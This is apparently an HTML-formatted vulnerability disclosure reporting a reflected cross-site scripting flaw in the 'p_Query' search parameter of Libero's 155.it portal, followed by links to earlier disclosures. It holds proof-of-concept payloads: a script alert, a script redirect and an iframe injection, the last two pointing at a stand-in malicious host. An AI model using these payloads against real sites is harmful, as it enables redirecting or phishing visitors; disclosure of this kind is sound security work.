The Italian ISP <a href="http://Libero.it" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">Libero.it</a> not check the HTTP POST Parameter "p_Query" on search query and displays the content of this variable without modification within the html form area.
<br clear="all">
<br>Security problems on Libero's <a href="http://155.it" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">155.it</a> allows attackers to conduct XSS attacks for the following URL:<br><br><a href="http://155.libero.it/pls/portal30/w155.cerca_nel_sito?p_Query=" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">
http://155.libero.it/pls/portal30/w155.cerca_nel_sito?p_Query=
</a><br><br>it is vulnerable for XSS via a malformed search query.<br>
<br>PoC:<br><br>- XSS in search function<br><br><a href="http://155.libero.it/pls/portal30/w155.cerca_nel_sito?p_Query=" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">http://155.libero.it/pls/portal30/w155.cerca_nel_sito?p_Query=
</a><script>alert(XSS)<script>
<br><br>- Redirect<br><br><a href="http://155.libero.it/pls/portal30/w155.cerca_nel_sito?p_Query=" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">http://155.libero.it/pls/portal30/w155.cerca_nel_sito?p_Query=
</a><script>location.href="<a href="http://www.maliciouswebsite.com" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">http://www.maliciouswebsite.com</a>";</script><br><br>- Html injection (iframe)
<br><br><a href="http://155.libero.it/pls/portal30/w155.cerca_nel_sito?p_Query=" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">
</a><a href="http://155.libero.it/pls/portal30/w155.cerca_nel_sito?p_Query=" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">http://155.libero.it/pls/portal30/w155.cerca_nel_sito?p_Query=</a> <iframe src="
<a href="http://www.maliciouswebsite.com" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">http://www.maliciouswebsite.com
</a>"></iframe><br><br>Previous vulnerabilities:<br><br><a href="http://lists.grok.org.uk/pipermail/full-disclosure/2007-March/061957.html" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">
http://lists.grok.org.uk/pipermail/full-disclosure/2007-March/061957.html
</a><br><a href="http://lists.grok.org.uk/pipermail/full-disclosure/2007-March/061957.html" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">http://lists.grok.org.uk/pipermail/full-disclosure/2007-March/061957.html
</a><br><a href="http://lists.grok.org.uk/pipermail/full-disclosure/2007-March/061939.html" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">
http://lists.grok.org.uk/pipermail/full-disclosure/2007-March/061939.html</a><br><a href="http://lists.grok.org.uk/pipermail/full-disclosure/2007-April/062055.html" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">
http://lists.grok.org.uk/pipermail/full-disclosure/2007-April/062055.html
</a><br><a href="http://lists.grok.org.uk/pipermail/full-disclosure/2007-July/064680.html" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">http://lists.grok.org.uk/pipermail/full-disclosure/2007-July/064680.html
</a><br><a href="http://lists.grok.org.uk/pipermail/full-disclosure/2007-July/064681.html" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">
http://lists.grok.org.uk/pipermail/full-disclosure/2007-July/064681.html</a><br><br>-- <br>Gianni Amato<br><a href="http://www.gianniamato.it/" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">http://www.gianniamato.it/
</a>